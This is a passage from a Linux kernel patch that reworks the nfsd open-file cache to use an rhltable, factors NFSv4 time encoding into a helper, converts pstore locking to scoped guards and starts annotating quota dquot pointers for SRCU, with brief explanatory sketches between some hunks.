++ * An open file, however, can block other activity (such as leases), or cause
+  * undesirable behavior (e.g. spurious silly-renames when reexporting NFS).
+  *
+  * This function is intended to find open nfsd_files when this sort of
+@@ -692,20 +579,17 @@ nfsd_file_cond_queue(struct nfsd_file *nf, struct list_head *dispose)
+ static void
+ nfsd_file_queue_for_close(struct inode *inode, struct list_head *dispose)
+ {
+-	struct nfsd_file_lookup_key key = {
+-		.type	= NFSD_FILE_KEY_INODE,
+-		.inode	= inode,
+-	};
++	struct rhlist_head *tmp, *list;
+ 	struct nfsd_file *nf;
+ 
+ 	rcu_read_lock();
+-	do {
+-		nf = rhashtable_lookup(&nfsd_file_rhash_tbl, &key,
+-				       nfsd_file_rhash_params);
+-		if (!nf)
+-			break;
++	list = rhltable_lookup(&nfsd_file_rhltable, &inode,
++			       nfsd_file_rhash_params);
++	rhl_for_each_entry_rcu(nf, tmp, list, nf_rlist) {
++		if (!test_bit(NFSD_FILE_GC, &nf->nf_flags))
++			continue;
+ 		nfsd_file_cond_queue(nf, dispose);
+-	} while (1);
++	}
+ 	rcu_read_unlock();
+ }
+ 
+@@ -758,8 +642,8 @@ nfsd_file_close_inode_sync(struct inode *inode)
+  * nfsd_file_delayed_close - close unused nfsd_files
+  * @work: dummy
+  *
+- * Walk the LRU list and destroy any entries that have not been used since
+- * the last scan.
++ * Scrape the freeme list for this nfsd_net, then dispose of all the
++ * files on it.
+  */
+ static void
+ nfsd_file_delayed_close(struct work_struct *work)
+@@ -768,7 +652,10 @@ nfsd_file_delayed_close(struct work_struct *work)
+ 	struct nfsd_fcache_disposal *l = container_of(work,
+ 			struct nfsd_fcache_disposal, work);
+ 
+-	nfsd_file_list_remove_disposal(&head, l);
++	spin_lock(&l->lock);
++	list_splice_init(&l->freeme, &head);
++	spin_unlock(&l->lock);
++
+ 	nfsd_file_dispose_list(&head);
+ }
+ 
+@@ -829,7 +716,7 @@ nfsd_file_cache_init(void)
+ 	if (test_and_set_bit(NFSD_FILE_CACHE_UP, &nfsd_file_flags) == 1)
+ 		return 0;
+ 
+-	ret = rhashtable_init(&nfsd_file_rhash_tbl, &nfsd_file_rhash_params);
++	ret = rhltable_init(&nfsd_file_rhltable, &nfsd_file_rhash_params);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -897,7 +784,7 @@ nfsd_file_cache_init(void)
+ 	nfsd_file_mark_slab = NULL;
+ 	destroy_workqueue(nfsd_filecache_wq);
+ 	nfsd_filecache_wq = NULL;
+-	rhashtable_destroy(&nfsd_file_rhash_tbl);
++	rhltable_destroy(&nfsd_file_rhltable);
+ 	goto out;
+ }
+ 
+@@ -906,7 +793,8 @@ nfsd_file_cache_init(void)
+  * @net: net-namespace to shut down the cache (may be NULL)
+  *
+  * Walk the nfsd_file cache and close out any that match @net. If @net is NULL,
+- * then close out everything. Called when an nfsd instance is being shut down.
++ * then close out everything. Called when an nfsd instance is being shut down,
++ * and when the exports table is flushed.
+  */
+ static void
+ __nfsd_file_cache_purge(struct net *net)
+@@ -915,7 +803,7 @@ __nfsd_file_cache_purge(struct net *net)
+ 	struct nfsd_file *nf;
+ 	LIST_HEAD(dispose);
+ 
+-	rhashtable_walk_enter(&nfsd_file_rhash_tbl, &iter);
++	rhltable_walk_enter(&nfsd_file_rhltable, &iter);
+ 	do {
+ 		rhashtable_walk_start(&iter);
+ 
+@@ -1021,7 +909,7 @@ nfsd_file_cache_shutdown(void)
+ 	nfsd_file_mark_slab = NULL;
+ 	destroy_workqueue(nfsd_filecache_wq);
+ 	nfsd_filecache_wq = NULL;
+-	rhashtable_destroy(&nfsd_file_rhash_tbl);
++	rhltable_destroy(&nfsd_file_rhltable);
+ 
+ 	for_each_possible_cpu(i) {
+ 		per_cpu(nfsd_file_cache_hits, i) = 0;
+@@ -1032,6 +920,35 @@ nfsd_file_cache_shutdown(void)
+ 	}
+ }
+ 
++static struct nfsd_file *
++nfsd_file_lookup_locked(const struct net *net, const struct cred *cred,
++			struct inode *inode, unsigned char need,
++			bool want_gc)
++{
++	struct rhlist_head *tmp, *list;
++	struct nfsd_file *nf;
++
++	list = rhltable_lookup(&nfsd_file_rhltable, &inode,
++			       nfsd_file_rhash_params);
++	rhl_for_each_entry_rcu(nf, tmp, list, nf_rlist) {
++		if (nf->nf_may != need)
++			continue;
++		if (nf->nf_net != net)
++			continue;
++		if (!nfsd_match_cred(nf->nf_cred, cred))
++			continue;
++		if (test_bit(NFSD_FILE_GC, &nf->nf_flags) != want_gc)
++			continue;
++		if (test_bit(NFSD_FILE_HASHED, &nf->nf_flags) == 0)
++			continue;
++
++		if (!nfsd_file_get(nf))
++			continue;
++		return nf;
++	}
++	return NULL;
++}
++
+ /**
+  * nfsd_file_is_cached - are there any cached open files for this inode?
+  * @inode: inode to check
+@@ -1046,15 +963,20 @@ nfsd_file_cache_shutdown(void)
+ bool
+ nfsd_file_is_cached(struct inode *inode)
+ {
+-	struct nfsd_file_lookup_key key = {
+-		.type	= NFSD_FILE_KEY_INODE,
+-		.inode	= inode,
+-	};
++	struct rhlist_head *tmp, *list;
++	struct nfsd_file *nf;
+ 	bool ret = false;
+ 
+-	if (rhashtable_lookup_fast(&nfsd_file_rhash_tbl, &key,
+-				   nfsd_file_rhash_params) != NULL)
+-		ret = true;
++	rcu_read_lock();
++	list = rhltable_lookup(&nfsd_file_rhltable, &inode,
++			       nfsd_file_rhash_params);
++	rhl_for_each_entry_rcu(nf, tmp, list, nf_rlist)
++		if (test_bit(NFSD_FILE_GC, &nf->nf_flags)) {
++			ret = true;
++			break;
++		}
++	rcu_read_unlock();
++
+ 	trace_nfsd_file_is_cached(inode, (int)ret);
+ 	return ret;
+ }
+@@ -1064,14 +986,12 @@ nfsd_file_do_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		     unsigned int may_flags, struct file *file,
+ 		     struct nfsd_file **pnf, bool want_gc)
+ {
+-	struct nfsd_file_lookup_key key = {
+-		.type	= NFSD_FILE_KEY_FULL,
+-		.need	= may_flags & NFSD_FILE_MAY_MASK,
+-		.net	= SVC_NET(rqstp),
+-		.gc	= want_gc,
+-	};
++	unsigned char need = may_flags & NFSD_FILE_MAY_MASK;
++	struct net *net = SVC_NET(rqstp);
++	struct nfsd_file *new, *nf;
++	const struct cred *cred;
+ 	bool open_retry = true;
+-	struct nfsd_file *nf;
++	struct inode *inode;
+ 	__be32 status;
+ 	int ret;
+ 
+@@ -1079,81 +999,88 @@ nfsd_file_do_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 				may_flags|NFSD_MAY_OWNER_OVERRIDE);
+ 	if (status != nfs_ok)
+ 		return status;
+-	key.inode = d_inode(fhp->fh_dentry);
+-	key.cred = get_current_cred();
++	inode = d_inode(fhp->fh_dentry);
++	cred = get_current_cred();
+ 
+ retry:
+ 	rcu_read_lock();
+-	nf = rhashtable_lookup(&nfsd_file_rhash_tbl, &key,
+-			       nfsd_file_rhash_params);
+-	if (nf)
+-		nf = nfsd_file_get(nf);
++	nf = nfsd_file_lookup_locked(net, cred, inode, need, want_gc);
+ 	rcu_read_unlock();
+ 
+ 	if (nf) {
++		/*
++		 * If the nf is on the LRU then it holds an extra reference
++		 * that must be put if it's removed. It had better not be
++		 * the last one however, since we should hold another.
++		 */
+ 		if (nfsd_file_lru_remove(nf))
+ 			WARN_ON_ONCE(refcount_dec_and_test(&nf->nf_ref));
+ 		goto wait_for_construction;
+ 	}
+ 
+-	nf = nfsd_file_alloc(&key, may_flags);
+-	if (!nf) {
++	new = nfsd_file_alloc(net, inode, need, want_gc);
++	if (!new) {
+ 		status = nfserr_jukebox;
+-		goto out_status;
++		goto out;
+ 	}
+ 
+-	ret = rhashtable_lookup_insert_key(&nfsd_file_rhash_tbl,
+-					   &key, &nf->nf_rhash,
+-					   nfsd_file_rhash_params);
++	rcu_read_lock();
++	spin_lock(&inode->i_lock);
++	nf = nfsd_file_lookup_locked(net, cred, inode, need, want_gc);
++	if (unlikely(nf)) {
++		spin_unlock(&inode->i_lock);
++		rcu_read_unlock();
++		nfsd_file_slab_free(&new->nf_rcu);
++		goto wait_for_construction;
++	}
++	nf = new;
++	ret = rhltable_insert(&nfsd_file_rhltable, &nf->nf_rlist,
++			      nfsd_file_rhash_params);
++	spin_unlock(&inode->i_lock);
++	rcu_read_unlock();
+ 	if (likely(ret == 0))
+ 		goto open_file;
+ 
+-	nfsd_file_slab_free(&nf->nf_rcu);
+-	nf = NULL;
+ 	if (ret == -EEXIST)
+ 		goto retry;
+-	trace_nfsd_file_insert_err(rqstp, key.inode, may_flags, ret);
++	trace_nfsd_file_insert_err(rqstp, inode, may_flags, ret);
+ 	status = nfserr_jukebox;
+-	goto out_status;
++	goto construction_err;
+ 
+ wait_for_construction:
+ 	wait_on_bit(&nf->nf_flags, NFSD_FILE_PENDING, TASK_UNINTERRUPTIBLE);
+ 
+ 	/* Did construction of this file fail? */
+ 	if (!test_bit(NFSD_FILE_HASHED, &nf->nf_flags)) {
+-		trace_nfsd_file_cons_err(rqstp, key.inode, may_flags, nf);
++		trace_nfsd_file_cons_err(rqstp, inode, may_flags, nf);
+ 		if (!open_retry) {
+ 			status = nfserr_jukebox;
+-			goto out;
++			goto construction_err;
+ 		}
+ 		open_retry = false;
+-		if (refcount_dec_and_test(&nf->nf_ref))
+-			nfsd_file_free(nf);
+ 		goto retry;
+ 	}
+-
+ 	this_cpu_inc(nfsd_file_cache_hits);
+ 
+ 	status = nfserrno(nfsd_open_break_lease(file_inode(nf->nf_file), may_flags));
++	if (status != nfs_ok) {
++		nfsd_file_put(nf);
++		nf = NULL;
++	}
++
+ out:
+ 	if (status == nfs_ok) {
+ 		this_cpu_inc(nfsd_file_acquisitions);
+ 		nfsd_file_check_write_error(nf);
+ 		*pnf = nf;
+-	} else {
+-		if (refcount_dec_and_test(&nf->nf_ref))
+-			nfsd_file_free(nf);
+-		nf = NULL;
+ 	}
+-
+-out_status:
+-	put_cred(key.cred);
+-	trace_nfsd_file_acquire(rqstp, key.inode, may_flags, nf, status);
++	put_cred(cred);
++	trace_nfsd_file_acquire(rqstp, inode, may_flags, nf, status);
+ 	return status;
+ 
+ open_file:
+ 	trace_nfsd_file_alloc(nf);
+-	nf->nf_mark = nfsd_file_mark_find_or_create(nf, key.inode);
++	nf->nf_mark = nfsd_file_mark_find_or_create(nf, inode);
+ 	if (nf->nf_mark) {
+ 		if (file) {
+ 			get_file(file);
+@@ -1171,13 +1098,16 @@ nfsd_file_do_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 	 * If construction failed, or we raced with a call to unlink()
+ 	 * then unhash.
+ 	 */
+-	if (status == nfs_ok && key.inode->i_nlink == 0)
+-		status = nfserr_jukebox;
+-	if (status != nfs_ok)
++	if (status != nfs_ok || inode->i_nlink == 0)
+ 		nfsd_file_unhash(nf);
+-	clear_bit_unlock(NFSD_FILE_PENDING, &nf->nf_flags);
+-	smp_mb__after_atomic();
+-	wake_up_bit(&nf->nf_flags, NFSD_FILE_PENDING);
++	clear_and_wake_up_bit(NFSD_FILE_PENDING, &nf->nf_flags);
++	if (status == nfs_ok)
++		goto out;
++
++construction_err:
++	if (refcount_dec_and_test(&nf->nf_ref))
++		nfsd_file_free(nf);
++	nf = NULL;
+ 	goto out;
+ }
+ 
+@@ -1193,8 +1123,11 @@ nfsd_file_do_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+  * seconds after the final nfsd_file_put() in case the caller
+  * wants to re-use it.
+  *
+- * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
+- * network byte order is returned.
++ * Return values:
++ *   %nfs_ok - @pnf points to an nfsd_file with its reference
++ *   count boosted.
++ *
++ * On error, an nfsstat value in network byte order is returned.
+  */
+ __be32
+ nfsd_file_acquire_gc(struct svc_rqst *rqstp, struct svc_fh *fhp,
+@@ -1214,8 +1147,11 @@ nfsd_file_acquire_gc(struct svc_rqst *rqstp, struct svc_fh *fhp,
+  * but not garbage-collected. The object is unhashed after the
+  * final nfsd_file_put().
+  *
+- * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
+- * network byte order is returned.
++ * Return values:
++ *   %nfs_ok - @pnf points to an nfsd_file with its reference
++ *   count boosted.
++ *
++ * On error, an nfsstat value in network byte order is returned.
+  */
+ __be32
+ nfsd_file_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+@@ -1236,8 +1172,11 @@ nfsd_file_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+  * and @file is non-NULL, use it to instantiate a new nfsd_file instead of
+  * opening a new one.
+  *
+- * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
+- * network byte order is returned.
++ * Return values:
++ *   %nfs_ok - @pnf points to an nfsd_file with its reference
++ *   count boosted.
++ *
++ * On error, an nfsstat value in network byte order is returned.
+  */
+ __be32
+ nfsd_file_acquire_opened(struct svc_rqst *rqstp, struct svc_fh *fhp,
+@@ -1268,7 +1207,7 @@ int nfsd_file_cache_stats_show(struct seq_file *m, void *v)
+ 		lru = list_lru_count(&nfsd_file_lru);
+ 
+ 		rcu_read_lock();
+-		ht = &nfsd_file_rhash_tbl;
++		ht = &nfsd_file_rhltable.ht;
+ 		count = atomic_read(&ht->nelems);
+ 		tbl = rht_dereference_rcu(ht->tbl, ht);
+ 		buckets = tbl->size;
+@@ -1284,7 +1223,7 @@ int nfsd_file_cache_stats_show(struct seq_file *m, void *v)
+ 		evictions += per_cpu(nfsd_file_evictions, i);
+ 	}
+ 
+-	seq_printf(m, "total entries: %u\n", count);
++	seq_printf(m, "total inodes:  %u\n", count);
+ 	seq_printf(m, "hash buckets:  %u\n", buckets);
+ 	seq_printf(m, "lru entries:   %lu\n", lru);
+ 	seq_printf(m, "cache hits:    %lu\n", hits);
+diff --git a/fs/nfsd/filecache.h b/fs/nfsd/filecache.h
+index 41516a4263ea5..e54165a3224f0 100644
+--- a/fs/nfsd/filecache.h
++++ b/fs/nfsd/filecache.h
+@@ -29,9 +29,8 @@ struct nfsd_file_mark {
+  * never be dereferenced, only used for comparison.
+  */
+ struct nfsd_file {
+-	struct rhash_head	nf_rhash;
+-	struct list_head	nf_lru;
+-	struct rcu_head		nf_rcu;
++	struct rhlist_head	nf_rlist;
++	void			*nf_inode;
+ 	struct file		*nf_file;
+ 	const struct cred	*nf_cred;
+ 	struct net		*nf_net;
+@@ -40,10 +39,12 @@ struct nfsd_file {
+ #define NFSD_FILE_REFERENCED	(2)
+ #define NFSD_FILE_GC		(3)
+ 	unsigned long		nf_flags;
+-	struct inode		*nf_inode;	/* don't deref */
+ 	refcount_t		nf_ref;
+ 	unsigned char		nf_may;
++
+ 	struct nfsd_file_mark	*nf_mark;
++	struct list_head	nf_lru;
++	struct rcu_head		nf_rcu;
+ 	ktime_t			nf_birthtime;
+ };
+ 
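
nfsd_file_get() above becomes NULL-tolerant, which is what lets
__nfs4_get_fd() in the nfs4state.c hunk below collapse to a single call. A
sketch of the pattern (a plain counter standing in for the kernel's atomic
refcount_inc_not_zero()):

#include <stdio.h>

struct obj {
	int refs;	/* plain int; the kernel uses refcount_t */
};

/* NULL-tolerant get: callers no longer need their own NULL check */
static struct obj *obj_get(struct obj *o)
{
	if (o && o->refs > 0) {
		o->refs++;
		return o;
	}
	return NULL;
}

int main(void)
{
	struct obj o = { .refs = 1 };

	printf("get(&o):   %s (refs=%d)\n", obj_get(&o) ? "ok" : "null", o.refs);
	printf("get(NULL): %s\n", obj_get(NULL) ? "ok" : "null");
	return 0;
}
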
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index b9d694ec25d19..e4522e86e984e 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -602,9 +602,7 @@ put_nfs4_file(struct nfs4_file *fi)
+ static struct nfsd_file *
+ __nfs4_get_fd(struct nfs4_file *f, int oflag)
+ {
+-	if (f->fi_fds[oflag])
+-		return nfsd_file_get(f->fi_fds[oflag]);
+-	return NULL;
++	return nfsd_file_get(f->fi_fds[oflag]);
+ }
+ 
+ static struct nfsd_file *
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 597f14a80512f..4ed9fef14adc2 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -2541,6 +2541,20 @@ static __be32 *encode_change(__be32 *p, struct kstat *stat, struct inode *inode,
+ 	return p;
+ }
+ 
++static __be32 nfsd4_encode_nfstime4(struct xdr_stream *xdr,
++				    struct timespec64 *tv)
++{
++	__be32 *p;
++
++	p = xdr_reserve_space(xdr, XDR_UNIT * 3);
++	if (!p)
++		return nfserr_resource;
++
++	p = xdr_encode_hyper(p, (s64)tv->tv_sec);
++	*p = cpu_to_be32(tv->tv_nsec);
++	return nfs_ok;
++}
++
+ /*
+  * ctime (in NFSv4, time_metadata) is not writeable, and the client
+  * doesn't really care what resolution could theoretically be stored by
+@@ -3346,11 +3360,14 @@ nfsd4_encode_fattr(struct xdr_stream *xdr, struct svc_fh *fhp,
+ 		p = xdr_encode_hyper(p, dummy64);
+ 	}
+ 	if (bmval1 & FATTR4_WORD1_TIME_ACCESS) {
+-		p = xdr_reserve_space(xdr, 12);
+-		if (!p)
+-			goto out_resource;
+-		p = xdr_encode_hyper(p, (s64)stat.atime.tv_sec);
+-		*p++ = cpu_to_be32(stat.atime.tv_nsec);
++		status = nfsd4_encode_nfstime4(xdr, &stat.atime);
++		if (status)
++			goto out;
++	}
++	if (bmval1 & FATTR4_WORD1_TIME_CREATE) {
++		status = nfsd4_encode_nfstime4(xdr, &stat.btime);
++		if (status)
++			goto out;
+ 	}
+ 	if (bmval1 & FATTR4_WORD1_TIME_DELTA) {
+ 		p = xdr_reserve_space(xdr, 12);
+@@ -3359,25 +3376,14 @@ nfsd4_encode_fattr(struct xdr_stream *xdr, struct svc_fh *fhp,
+ 		p = encode_time_delta(p, d_inode(dentry));
+ 	}
+ 	if (bmval1 & FATTR4_WORD1_TIME_METADATA) {
+-		p = xdr_reserve_space(xdr, 12);
+-		if (!p)
+-			goto out_resource;
+-		p = xdr_encode_hyper(p, (s64)stat.ctime.tv_sec);
+-		*p++ = cpu_to_be32(stat.ctime.tv_nsec);
++		status = nfsd4_encode_nfstime4(xdr, &stat.ctime);
++		if (status)
++			goto out;
+ 	}
+ 	if (bmval1 & FATTR4_WORD1_TIME_MODIFY) {
+-		p = xdr_reserve_space(xdr, 12);
+-		if (!p)
+-			goto out_resource;
+-		p = xdr_encode_hyper(p, (s64)stat.mtime.tv_sec);
+-		*p++ = cpu_to_be32(stat.mtime.tv_nsec);
+-	}
+-	if (bmval1 & FATTR4_WORD1_TIME_CREATE) {
+-		p = xdr_reserve_space(xdr, 12);
+-		if (!p)
+-			goto out_resource;
+-		p = xdr_encode_hyper(p, (s64)stat.btime.tv_sec);
+-		*p++ = cpu_to_be32(stat.btime.tv_nsec);
++		status = nfsd4_encode_nfstime4(xdr, &stat.mtime);
++		if (status)
++			goto out;
+ 	}
+ 	if (bmval1 & FATTR4_WORD1_MOUNTED_ON_FILEID) {
+ 		u64 ino = stat.ino;
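
nfsd4_encode_nfstime4() above deduplicates four open-coded encoders: an
nfstime4 is XDR_UNIT * 3 = 12 bytes on the wire, a big-endian 64-bit
seconds field followed by a big-endian 32-bit nseconds field. A userspace
sketch of that layout:

#include <stdio.h>
#include <stdint.h>

#define XDR_UNIT 4

/* nfstime4 on the wire: 8-byte big-endian seconds, 4-byte nseconds */
static void encode_nfstime4(unsigned char *p, int64_t sec, uint32_t nsec)
{
	uint64_t s = (uint64_t)sec;
	int i;

	for (i = 0; i < 8; i++)
		p[i] = s >> (56 - 8 * i);
	for (i = 0; i < 4; i++)
		p[8 + i] = nsec >> (24 - 8 * i);
}

int main(void)
{
	unsigned char buf[XDR_UNIT * 3];
	int i;

	encode_nfstime4(buf, 1701600963, 123456789);
	for (i = 0; i < (int)sizeof(buf); i++)
		printf("%02x%c", buf[i], i % 4 == 3 ? '\n' : ' ');
	return 0;
}
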
+diff --git a/fs/pstore/inode.c b/fs/pstore/inode.c
+index ffbadb8b3032d..ea3f104371d62 100644
+--- a/fs/pstore/inode.c
++++ b/fs/pstore/inode.c
+@@ -182,25 +182,21 @@ static int pstore_unlink(struct inode *dir, struct dentry *dentry)
+ {
+ 	struct pstore_private *p = d_inode(dentry)->i_private;
+ 	struct pstore_record *record = p->record;
+-	int rc = 0;
+ 
+ 	if (!record->psi->erase)
+ 		return -EPERM;
+ 
+ 	/* Make sure we can't race while removing this file. */
+-	mutex_lock(&records_list_lock);
+-	if (!list_empty(&p->list))
+-		list_del_init(&p->list);
+-	else
+-		rc = -ENOENT;
+-	p->dentry = NULL;
+-	mutex_unlock(&records_list_lock);
+-	if (rc)
+-		return rc;
+-
+-	mutex_lock(&record->psi->read_mutex);
+-	record->psi->erase(record);
+-	mutex_unlock(&record->psi->read_mutex);
++	scoped_guard(mutex, &records_list_lock) {
++		if (!list_empty(&p->list))
++			list_del_init(&p->list);
++		else
++			return -ENOENT;
++		p->dentry = NULL;
++	}
++
++	scoped_guard(mutex, &record->psi->read_mutex)
++		record->psi->erase(record);
+ 
+ 	return simple_unlink(dir, dentry);
+ }
+@@ -292,19 +288,16 @@ static struct dentry *psinfo_lock_root(void)
+ {
+ 	struct dentry *root;
+ 
+-	mutex_lock(&pstore_sb_lock);
++	guard(mutex)(&pstore_sb_lock);
+ 	/*
+ 	 * Having no backend is fine -- no records appear.
+ 	 * Not being mounted is fine -- nothing to do.
+ 	 */
+-	if (!psinfo || !pstore_sb) {
+-		mutex_unlock(&pstore_sb_lock);
++	if (!psinfo || !pstore_sb)
+ 		return NULL;
+-	}
+ 
+ 	root = pstore_sb->s_root;
+ 	inode_lock(d_inode(root));
+-	mutex_unlock(&pstore_sb_lock);
+ 
+ 	return root;
+ }
+@@ -313,29 +306,25 @@ int pstore_put_backend_records(struct pstore_info *psi)
+ {
+ 	struct pstore_private *pos, *tmp;
+ 	struct dentry *root;
+-	int rc = 0;
+ 
+ 	root = psinfo_lock_root();
+ 	if (!root)
+ 		return 0;
+ 
+-	mutex_lock(&records_list_lock);
+-	list_for_each_entry_safe(pos, tmp, &records_list, list) {
+-		if (pos->record->psi == psi) {
+-			list_del_init(&pos->list);
+-			rc = simple_unlink(d_inode(root), pos->dentry);
+-			if (WARN_ON(rc))
+-				break;
+-			d_drop(pos->dentry);
+-			dput(pos->dentry);
+-			pos->dentry = NULL;
++	scoped_guard(mutex, &records_list_lock) {
++		list_for_each_entry_safe(pos, tmp, &records_list, list) {
++			if (pos->record->psi == psi) {
++				list_del_init(&pos->list);
++				d_invalidate(pos->dentry);
++				simple_unlink(d_inode(root), pos->dentry);
++				pos->dentry = NULL;
++			}
+ 		}
+ 	}
+-	mutex_unlock(&records_list_lock);
+ 
+ 	inode_unlock(d_inode(root));
+ 
+-	return rc;
++	return 0;
+ }
+ 
+ /*
+@@ -355,20 +344,20 @@ int pstore_mkfile(struct dentry *root, struct pstore_record *record)
+ 	if (WARN_ON(!inode_is_locked(d_inode(root))))
+ 		return -EINVAL;
+ 
+-	rc = -EEXIST;
++	guard(mutex)(&records_list_lock);
++
+ 	/* Skip records that are already present in the filesystem. */
+-	mutex_lock(&records_list_lock);
+ 	list_for_each_entry(pos, &records_list, list) {
+ 		if (pos->record->type == record->type &&
+ 		    pos->record->id == record->id &&
+ 		    pos->record->psi == record->psi)
+-			goto fail;
++			return -EEXIST;
+ 	}
+ 
+ 	rc = -ENOMEM;
+ 	inode = pstore_get_inode(root->d_sb);
+ 	if (!inode)
+-		goto fail;
++		return -ENOMEM;
+ 	inode->i_mode = S_IFREG | 0444;
+ 	inode->i_fop = &pstore_file_operations;
+ 	scnprintf(name, sizeof(name), "%s-%s-%llu%s",
+@@ -395,7 +384,6 @@ int pstore_mkfile(struct dentry *root, struct pstore_record *record)
+ 	d_add(dentry, inode);
+ 
+ 	list_add(&private->list, &records_list);
+-	mutex_unlock(&records_list_lock);
+ 
+ 	return 0;
+ 
+@@ -403,8 +391,6 @@ int pstore_mkfile(struct dentry *root, struct pstore_record *record)
+ 	free_pstore_private(private);
+ fail_inode:
+ 	iput(inode);
+-fail:
+-	mutex_unlock(&records_list_lock);
+ 	return rc;
+ }
+ 
+@@ -450,9 +436,8 @@ static int pstore_fill_super(struct super_block *sb, void *data, int silent)
+ 	if (!sb->s_root)
+ 		return -ENOMEM;
+ 
+-	mutex_lock(&pstore_sb_lock);
+-	pstore_sb = sb;
+-	mutex_unlock(&pstore_sb_lock);
++	scoped_guard(mutex, &pstore_sb_lock)
++		pstore_sb = sb;
+ 
+ 	pstore_get_records(0);
+ 
+@@ -467,17 +452,14 @@ static struct dentry *pstore_mount(struct file_system_type *fs_type,
+ 
+ static void pstore_kill_sb(struct super_block *sb)
+ {
+-	mutex_lock(&pstore_sb_lock);
++	guard(mutex)(&pstore_sb_lock);
+ 	WARN_ON(pstore_sb && pstore_sb != sb);
+ 
+ 	kill_litter_super(sb);
+ 	pstore_sb = NULL;
+ 
+-	mutex_lock(&records_list_lock);
++	guard(mutex)(&records_list_lock);
+ 	INIT_LIST_HEAD(&records_list);
+-	mutex_unlock(&records_list_lock);
+-
+-	mutex_unlock(&pstore_sb_lock);
+ }
+ 
+ static struct file_system_type pstore_fs_type = {
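
The pstore conversion above replaces manual mutex_lock()/mutex_unlock() pairs with the scope-based helpers from <linux/cleanup.h>: guard() holds the lock until the enclosing function returns, scoped_guard() holds it for exactly one statement or block, and both release automatically on every early return. A minimal sketch of the two forms, assuming the cleanup.h guard infrastructure this patch depends on (my_lock and shared_count are illustrative names):

	#include <linux/cleanup.h>
	#include <linux/errno.h>
	#include <linux/mutex.h>

	static DEFINE_MUTEX(my_lock);
	static int shared_count;

	static int bump_if_nonnegative(void)
	{
		guard(mutex)(&my_lock);		/* dropped on any return path */
		if (shared_count < 0)
			return -EINVAL;		/* unlocks here, too */
		shared_count++;
		return 0;
	}

	static void reset_count(void)
	{
		scoped_guard(mutex, &my_lock)	/* held for this block only */
			shared_count = 0;
		/* my_lock is already released here */
	}

This is why pstore_unlink() can now return -ENOENT from inside the scoped_guard() block without the unlock bookkeeping the old rc variable existed for.
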
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index b0cf3869d3bf5..b67557647d61f 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -399,15 +399,17 @@ int dquot_mark_dquot_dirty(struct dquot *dquot)
+ EXPORT_SYMBOL(dquot_mark_dquot_dirty);
+ 
+ /* Dirtify all the dquots - this can block when journalling */
+-static inline int mark_all_dquot_dirty(struct dquot * const *dquot)
++static inline int mark_all_dquot_dirty(struct dquot __rcu * const *dquots)
+ {
+ 	int ret, err, cnt;
++	struct dquot *dquot;
+ 
+ 	ret = err = 0;
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		if (dquot[cnt])
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (dquot)
+ 			/* Even in case of error we have to continue */
+-			ret = mark_dquot_dirty(dquot[cnt]);
++			ret = mark_dquot_dirty(dquot);
+ 		if (!err)
+ 			err = ret;
+ 	}
+@@ -1004,14 +1006,15 @@ struct dquot *dqget(struct super_block *sb, struct kqid qid)
+ }
+ EXPORT_SYMBOL(dqget);
+ 
+-static inline struct dquot **i_dquot(struct inode *inode)
++static inline struct dquot __rcu **i_dquot(struct inode *inode)
+ {
+-	return inode->i_sb->s_op->get_dquots(inode);
++	/* Force __rcu for now until filesystems are fixed */
++	return (struct dquot __rcu **)inode->i_sb->s_op->get_dquots(inode);
+ }
+ 
+ static int dqinit_needed(struct inode *inode, int type)
+ {
+-	struct dquot * const *dquots;
++	struct dquot __rcu * const *dquots;
+ 	int cnt;
+ 
+ 	if (IS_NOQUOTA(inode))
+@@ -1084,59 +1087,7 @@ static int add_dquot_ref(struct super_block *sb, int type)
+ 	return err;
+ }
+ 
+-/*
+- * Remove references to dquots from inode and add dquot to list for freeing
+- * if we have the last reference to dquot
+- */
+-static void remove_inode_dquot_ref(struct inode *inode, int type,
+-				   struct list_head *tofree_head)
+-{
+-	struct dquot **dquots = i_dquot(inode);
+-	struct dquot *dquot = dquots[type];
+-
+-	if (!dquot)
+-		return;
+-
+-	dquots[type] = NULL;
+-	if (list_empty(&dquot->dq_free)) {
+-		/*
+-		 * The inode still has reference to dquot so it can't be in the
+-		 * free list
+-		 */
+-		spin_lock(&dq_list_lock);
+-		list_add(&dquot->dq_free, tofree_head);
+-		spin_unlock(&dq_list_lock);
+-	} else {
+-		/*
+-		 * Dquot is already in a list to put so we won't drop the last
+-		 * reference here.
+-		 */
+-		dqput(dquot);
+-	}
+-}
+-
+-/*
+- * Free list of dquots
+- * Dquots are removed from inodes and no new references can be got so we are
+- * the only ones holding reference
+- */
+-static void put_dquot_list(struct list_head *tofree_head)
+-{
+-	struct list_head *act_head;
+-	struct dquot *dquot;
+-
+-	act_head = tofree_head->next;
+-	while (act_head != tofree_head) {
+-		dquot = list_entry(act_head, struct dquot, dq_free);
+-		act_head = act_head->next;
+-		/* Remove dquot from the list so we won't have problems... */
+-		list_del_init(&dquot->dq_free);
+-		dqput(dquot);
+-	}
+-}
+-
+-static void remove_dquot_ref(struct super_block *sb, int type,
+-		struct list_head *tofree_head)
++static void remove_dquot_ref(struct super_block *sb, int type)
+ {
+ 	struct inode *inode;
+ #ifdef CONFIG_QUOTA_DEBUG
+@@ -1153,11 +1104,18 @@ static void remove_dquot_ref(struct super_block *sb, int type,
+ 		 */
+ 		spin_lock(&dq_data_lock);
+ 		if (!IS_NOQUOTA(inode)) {
++			struct dquot __rcu **dquots = i_dquot(inode);
++			struct dquot *dquot = srcu_dereference_check(
